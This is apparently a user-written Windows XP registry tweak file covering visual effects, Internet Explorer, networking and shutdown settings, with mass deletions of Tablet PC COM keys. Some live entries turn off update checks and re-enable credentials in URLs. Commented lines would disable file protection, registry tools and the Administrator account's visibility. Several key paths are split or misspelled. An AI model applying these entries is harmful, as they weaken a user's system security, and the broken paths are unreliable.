"IRQ8Priority"=dword:00000001
;nVidia OverClock/Tweak mode enable (Note: Use only if you have an nVidia Card!
;[HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation\Global\NVTweak]
;"CoolBits"=dword:00000003
;----------------------------------------------------------------------------------
;[HKEY_CURRENT_USER\Control Panel\Desktop]
;"DragFullWindows"="0"
[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]
MinAnimate="0"
;Visual FX Settings:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects]
"VisualFXSetting"=dword:00000003
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\AnimateMinMax]
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\ComboBoxAnimation]
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\CursorShadow]
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\DragFullWindows]
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\DropShadow]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\FontSmoothing]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\ListBoxSmoothScrolling]
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\ListviewAlphaSelect]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\ListviewShadow]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\ListviewWatermark]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\MenuAnimation]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\SelectionFade]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\TaskbarAnimations]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\Themes]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\TooltipAnimation]
"DefaultValue"=dword:00000001
"DefaultApplied"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\WebView]
"DefaultApplied"=dword:00000001
;----------------------------------------------------------------------------------
;-----(7/9)----------------------Internet Explorer---------------------------------
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
;Auto-Complete
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\AutoComplete]
"Append Completion"="yes"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"NoUpdateCheck"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="about:blank"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSKB]
@="http://support.microsoft.com/?kbid=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\AV]
@="http://www.altavista.com/sites/search/web?q=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\Ggl]
@="http://www.google.com/search?q=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSN]
@="http://search.msn.com/results.asp?q=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\FM]
@="http://www.filemirrors.com/search.src?file=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"AllowWindowReuse"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server"=dword:0000000a
"MaxConnectionsPerServer"=dword:0000000a
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl
\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]
"iexplore.exe"=dword:00000000
"explorer.exe"=dword:00000000
;[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
;----------------------------------------------------------------------------------
; Note: All the settings here are commented out. Enable them only if required
;Disabling Ctrl+Alt+Del
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
;"DisableCAD"=dword:00000001
;[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
;"DisableRegistryTools"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer]
;"DisableMSI"=dword:00000002
;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoViewContextMenu"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
;"NoViewContextMenu"=dword:00000001
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
;"LogonType"=dword:00000000
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
;"DontDisplayLastUserName"=dword:00000001
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\SpecialAccounts\UserList]
;"Administrator"=dword:00000001
;[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
;"IgnoreShiftOverride"="1"
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\SpecialAccounts\UserList]
;"Name of a user"=dword:00000000
; etc...
;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
;"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
; 00,00,00,00
;"Enable"=dword:00000000
;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
\Add]
;"SFCDisable"=dword:FFFFFF9D
;----------------------------------------------------------------------------------
[-HKEY_CLASSES_ROOT\CLSID\{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}]
[-HKEY_CLASSES_ROOT\CLSID\{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}]
[-HKEY_CLASSES_ROOT\CLSID\{8DD448E6-C188-4aed-AF92-44956194EB1F}]
;Removes Sign up with Passport Wizard when trying to sign in MSN Messenger
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
\Passport]
"RegistrationCompleted"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Notepad]
"StatusBar"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer]
"DisableRollback"=dword:00000001
"QTTaskRunFlags"=dword:00000002
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Outlook
\InstantMessaging]
"ForceDisableIM"=dword:00000001
; 64 Kbps = 0000fa00
; 56 Kbps = 0000dac0
[HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Settings\MP3Encoding]
"LowRate"=dword:0000dac0
"MediumRate"=dword:0001f400
"MediumHighRate"=dword:0003e800
"HighRate"=dword:0004e200
;Change Windows Media Player Title (eg: Windows Media Player provided by [deXter]
; The 'Provided By' is added automatically, hence specify only the OEM name below:
;[HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer]
;"TitleBar"="[deXter]"
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
[-HKEY_CLASSES_ROOT\AppID\{7F429620-16D1-471E-A81A-114992148034}]
[-HKEY_CLASSES_ROOT\AppID\wisptis.EXE]
[-HKEY_CLASSES_ROOT\CLSID\{04A1E553-FE36-4FDE-865E-344194E69424}]
[-HKEY_CLASSES_ROOT\CLSID\{13DE4A42-8D21-4C8E-BF9C-8F69CB068FCA}]
[-HKEY_CLASSES_ROOT\CLSID\{242025BB-8546-48B6-B9B0-F4406C54ACFC}]
[-HKEY_CLASSES_ROOT\CLSID\{3336B8BF-45AF-429F-85CB-8C435FBF21E4}]
[-HKEY_CLASSES_ROOT\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}]
[-HKEY_CLASSES_ROOT\CLSID\{43B07326-AAE0-4B62-A83D-5FD768B7353C}]
[-HKEY_CLASSES_ROOT\AppID\{7F429620-16D1-471E-A81A-114992148034}]
[-HKEY_CLASSES_ROOT\AppID\wisptis.EXE]
[-HKEY_CLASSES_ROOT\CLSID\{04A1E553-FE36-4FDE-865E-344194E69424}]
[-HKEY_CLASSES_ROOT\CLSID\{13DE4A42-8D21-4C8E-BF9C-8F69CB068FCA}]
[-HKEY_CLASSES_ROOT\CLSID\{242025BB-8546-48B6-B9B0-F4406C54ACFC}]
[-HKEY_CLASSES_ROOT\CLSID\{3336B8BF-45AF-429F-85CB-8C435FBF21E4}]
[-HKEY_CLASSES_ROOT\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}]
[-HKEY_CLASSES_ROOT\CLSID\{43B07326-AAE0-4B62-A83D-5FD768B7353C}]
[-HKEY_CLASSES_ROOT\CLSID\{43FB1553-AD74-4EE8-88E4-3E6DAAC915DB}]
[-HKEY_CLASSES_ROOT\CLSID\{524B13ED-2E57-40B8-B801-5FA35122EB5C}]
[-HKEY_CLASSES_ROOT\CLSID\{632A2D3D-86AF-411A-8654-7511B51B3D5F}]
[-HKEY_CLASSES_ROOT\CLSID\{65D00646-CDE3-4A88-9163-6769F0F1A97D}]
[-HKEY_CLASSES_ROOT\CLSID\{6E4FCB12-510A-4D40-9304-1DA10AE9147C}]
[-HKEY_CLASSES_ROOT\CLSID\{786CDB70-1628-44A0-853C-5D340A499137}]
[-HKEY_CLASSES_ROOT\CLSID\{836FA1B6-1190-4005-B434-7ED921BE2026}]
[-HKEY_CLASSES_ROOT\CLSID\{8770D941-A63A-4671-A375-2855A18EBA73}]
[-HKEY_CLASSES_ROOT\CLSID\{8854F6A0-4683-4AE7-9191-752FE64612C3}]
[-HKEY_CLASSES_ROOT\CLSID\{937C1A34-151D-4610-9CA6-A8CC9BDB5D83}]
[-HKEY_CLASSES_ROOT\CLSID\{9C1CC6E4-D7EB-4EEB-9091-15A7C8791ED9}]
[-HKEY_CLASSES_ROOT\CLSID\{9DE85094-F71F-44F1-8471-15A2FA76FCF3}]
[-HKEY_CLASSES_ROOT\CLSID\{9FD4E808-F6E6-4E65-98D3-AA39054C1255}]
[-HKEY_CLASSES_ROOT\CLSID\{A5558507-9B96-46BA-94ED-982E684A9A6B}]
[-HKEY_CLASSES_ROOT\CLSID\{A5B020FD-E04B-4E67-B65A-E7DEED25B2CF}]
[-HKEY_CLASSES_ROOT\CLSID\{AAC46A37-9229-4FC0-8CCE-4497569BF4D1}]
[-HKEY_CLASSES_ROOT\CLSID\{C52FF1FD-EB6C-42CF-9140-83DEFECA7E29}]
[-HKEY_CLASSES_ROOT\CLSID\{D8BF32A2-05A5-44C3-B3AA-5E80AC7D2576}]
[-HKEY_CLASSES_ROOT\CLSID\{DE815B00-9460-4F6E-9471-892ED2275EA5}]
[-HKEY_CLASSES_ROOT\CLSID\{E3D5D93C-1663-4A78-A1A7-22375DFEBAEE}]
[-HKEY_CLASSES_ROOT\CLSID\{E5CA59F5-57C4-4DD8-9BD6-1DEEEDD27AF4}]
[-HKEY_CLASSES_ROOT\CLSID\{E9A6AB1B-0C9C-44AC-966E-560C2771D1E8}]
[-HKEY_CLASSES_ROOT\CLSID\{EFB4A0CB-A01F-451C-B6B7-56F02F77D76F}]
[-HKEY_CLASSES_ROOT\CLSID\{F0291081-E87C-4E07-97DA-A0A03761E586}]
[-HKEY_CLASSES_ROOT\CLSID\{43FB1553-AD74-4EE8-88E4-3E6DAAC915DB}]
[-HKEY_CLASSES_ROOT\CLSID\{524B13ED-2E57-40B8-B801-5FA35122EB5C}]
[-HKEY_CLASSES_ROOT\CLSID\{632A2D3D-86AF-411A-8654-7511B51B3D5F}]
[-HKEY_CLASSES_ROOT\CLSID\{65D00646-CDE3-4A88-9163-6769F0F1A97D}]
[-HKEY_CLASSES_ROOT\CLSID\{6E4FCB12-510A-4D40-9304-1DA10AE9147C}]
[-HKEY_CLASSES_ROOT\CLSID\{786CDB70-1628-44A0-853C-5D340A499137}]
[-HKEY_CLASSES_ROOT\CLSID\{836FA1B6-1190-4005-B434-7ED921BE2026}]
[-HKEY_CLASSES_ROOT\CLSID\{8770D941-A63A-4671-A375-2855A18EBA73}]
[-HKEY_CLASSES_ROOT\CLSID\{8854F6A0-4683-4AE7-9191-752FE64612C3}]
[-HKEY_CLASSES_ROOT\CLSID\{937C1A34-151D-4610-9CA6-A8CC9BDB5D83}]
[-HKEY_CLASSES_ROOT\CLSID\{9C1CC6E4-D7EB-4EEB-9091-15A7C8791ED9}]
[-HKEY_CLASSES_ROOT\CLSID\{9DE85094-F71F-44F1-8471-15A2FA76FCF3}]
[-HKEY_CLASSES_ROOT\CLSID\{9FD4E808-F6E6-4E65-98D3-AA39054C1255}]
[-HKEY_CLASSES_ROOT\CLSID\{A5558507-9B96-46BA-94ED-982E684A9A6B}]
[-HKEY_CLASSES_ROOT\CLSID\{A5B020FD-E04B-4E67-B65A-E7DEED25B2CF}]
[-HKEY_CLASSES_ROOT\CLSID\{AAC46A37-9229-4FC0-8CCE-4497569BF4D1}]
[-HKEY_CLASSES_ROOT\CLSID\{C52FF1FD-EB6C-42CF-9140-83DEFECA7E29}]
[-HKEY_CLASSES_ROOT\CLSID\{D8BF32A2-05A5-44C3-B3AA-5E80AC7D2576}]
[-HKEY_CLASSES_ROOT\CLSID\{DE815B00-9460-4F6E-9471-892ED2275EA5}]
[-HKEY_CLASSES_ROOT\CLSID\{E3D5D93C-1663-4A78-A1A7-22375DFEBAEE}]
[-HKEY_CLASSES_ROOT\CLSID\{E5CA59F5-57C4-4DD8-9BD6-1DEEEDD27AF4}]
[-HKEY_CLASSES_ROOT\CLSID\{E9A6AB1B-0C9C-44AC-966E-560C2771D1E8}]
[-HKEY_CLASSES_ROOT\CLSID\{EFB4A0CB-A01F-451C-B6B7-56F02F77D76F}]
[-HKEY_CLASSES_ROOT\CLSID\{F0291081-E87C-4E07-97DA-A0A03761E586}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Components\1125549C421D34E4DBF1036F62580BE1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Components\652A08B235C6DFF4C8CD41B52DE68CA4]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Components\9B4B5940D4625D64C85532B8CDE3BF4D]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Components\D656DA4A9E277A34D90D5E6FFA34E827]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPFiles]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer
\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features
\WISPHidden]
[-HKEY_CLASSES_ROOT\TpcCom]
[-HKEY_CLASSES_ROOT\TpcCom.ClassicW]
[-HKEY_CLASSES_ROOT\TpcCom.ClassicW.1]
[-HKEY_CLASSES_ROOT\TpcCom.DrawAttrs]
[-HKEY_CLASSES_ROOT\TpcCom.DrawAttrs.1]
[-HKEY_CLASSES_ROOT\TpcCom.DrawAttrsXP]
[-HKEY_CLASSES_ROOT\TpcCom.DrawAttrsXP.1]
[-HKEY_CLASSES_ROOT\TpcCom.GenericRecognizer]
[-HKEY_CLASSES_ROOT\TpcCom.GenericRecognizer.1]
[-HKEY_CLASSES_ROOT\TpcCom.InkObject]
[-HKEY_CLASSES_ROOT\TpcCom.InkObject.1]
[-HKEY_CLASSES_ROOT\TpcCom.InkObjectXP]
[-HKEY_CLASSES_ROOT\TpcCom.InkObjectXP.1]
[-HKEY_CLASSES_ROOT\TpcCom.InkSettings.1]
[-HKEY_CLASSES_ROOT\TpcCom.Lattice.1]
[-HKEY_CLASSES_ROOT\TpcCom.RecoManager]
[-HKEY_CLASSES_ROOT\TpcCom.RecoManager.1]
[-HKEY_CLASSES_ROOT\TpcCom.TabletManager]
[-HKEY_CLASSES_ROOT\TpcCom.TabletManager.1]
[-HKEY_CLASSES_ROOT\TpcCom.UserDictionary]
[-HKEY_CLASSES_ROOT\TpcCom.UserDictionary.1]
[-HKEY_CLASSES_ROOT\TypeLib\{194508A0-B8D1-473E-A9B6-851AAF726A6D}]
[-HKEY_CLASSES_ROOT\TypeLib\{56D04F5D-964F-4DBF-8D23-B97989E53418}]
[-HKEY_CLASSES_ROOT\TypeLib\{773F1B9A-35B9-4E95-83A0-A210F2DE3B37}]
[-HKEY_CLASSES_ROOT\TypeLib\{7D868ACD-1A5D-4A47-A247-F39741353012}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Components\1125549C421D34E4DBF1036F62580BE1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Components\652A08B235C6DFF4C8CD41B52DE68CA4]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Components\9B4B5940D4625D64C85532B8CDE3BF4D]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Components\D656DA4A9E277A34D90D5E6FFA34E827]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features\WISPFiles]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Installer
\UserData\S-1-5-18\Products\7040110900063D11C8EF10054038389C\Features
\WISPHidden]
PART 2
============================================================================
=======================
============================================================================
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms]
"AskUser"=dword:00000000
; Set HomePage
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="www.google.ca"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
\Cache]
"Persistent"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\Cache]
"Persistent"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server"=dword:0000000a
"MaxConnectionsPerServer"=dword:0000000a
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"Locked"=dword:00000001
"LinksFolderName"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Enable AutoImageResize"="no"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"StatusBarWeb"=dword:00000001
"StatusBarOther"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\ZoneMap\ProtocolDefaults]
"about"=dword:00000004
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.google.com/ie"
============================================================================
============================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer]
"GroupPrivacyAcceptance"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings]
"EnableDVDUI"="yes"
============================================================================
======================
============================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]
"Hide Messenger"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]
"BlockExeAttachments"=dword:00000001
============================================================================
===========================
============================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Acrobat Reader\6.0\AdobeViewer]
"EULA"=dword:00000001
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\6.0\Updater]
"iUpdateFrequency"=dword:00000000
[HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\6.0\Originals]
"bDisplayAboutDialog"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Notepad]
"StatusBar"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Notepad]
"fWrap"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo]
"Application"="NOTEPAD.EXE"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithList]
"a"="Explorer.exe"
"MRUList"="ba"
"b"="NOTEPAD.EXE"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.
nfo\OpenWithProgids]
"MSInfo.Document"=hex(0):
============================================================================
==============================
============================================================================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"NegativeCacheTime"=dword:00000000
"NetFailureCacheTime"=dword:00000000
"NegativeSOACacheTime"=dword:00000000
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer"=dword:00000040
"MaxConnectionsPer1_0Server"=dword:00000040
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider]
"DnsPriority"=dword:00000001
"HostsPriority"=dword:00000001
"LocalPriority"=dword:00000001
"NetbtPriority"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Psched]
"NonBestEffortLimit"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation
\parameters]
"MaxCmds"=dword:00000001
"MaxThreads"=dword:00000064
"MaxCollectionCount"=dword:00000064
============================================================================
=============================
============================================================================
[-HKEY_CLASSES_ROOT\.avi\ShellEx]
[-HKEY_CLASSES_ROOT\.mpg\ShellEx]
[-HKEY_CLASSES_ROOT\.mpe\ShellEx]
[-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray]
"Services"=dword:0000001f
[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating\.default]
@=" "
[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\Explorer\Navigating\.current]
@=" "
============================================================================
=========================
============================================================================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"ClearPageFileAtShutdown"=dword:00000001
; Disable Hibernation
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]
"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Power]
"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power]
"Heuristics"=hex:05,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,3f,42,0f,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MsnMsgr"=-
============================================================================
===========================
============================================================================
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSMBalloonTip"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]
"RunCount"=dword:00000000
"ForceClassicControlPanel"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
\Environment]
"DEVMGR_SHOW_DETAILS"=dword:00000001
"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{c95fe080-
8f5d-11d2-a20b-00aa003c157a}]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\CabinetState]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoStrCmpLogical"=dword:00000001
============================================================================
===========================
============================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-
08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"
============================================================================
============================================================================
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes
\DownloadSites]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Desktop\General]
"BackupWallpaper"="%Windir%\\Web\\Wallpaper\\lh_bliss.bmp"
"Wallpaper"="%Windir%\\Web\\Wallpaper\\lh_bliss.bmp"
============================================================================
============================================================================
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop
\CleanupWiz]
"NoRun"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Link"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\lnkfile]
"IsShortcut"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\HideDesktopIcons\NewStartPanel]
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\HideDesktopIcons\NewStartPanel]
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\HideDesktopIcons\NewStartPanel]
"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000000
============================================================================
============================================================================
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\stisvc]
"Start"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"NoNetCrawling"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
"NoRemoteRecursiveEvents"=dword:00000001
[-HKEY_CLASSES_ROOT\.zip\CompressedFolder]
[-HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder]
; Speed up Shutdown
[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"
"HungAppTimeout"="100"
"WaitToKillAppTimeout"="1000"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"
[-HKEY_CLASSES_ROOT\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}]]
[-HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-
5FE6850DC73E}\InProcServer32]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory
Management]
"DisablePagingExecutive"=dword:00000001
============================================================================
============================================================================
[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]
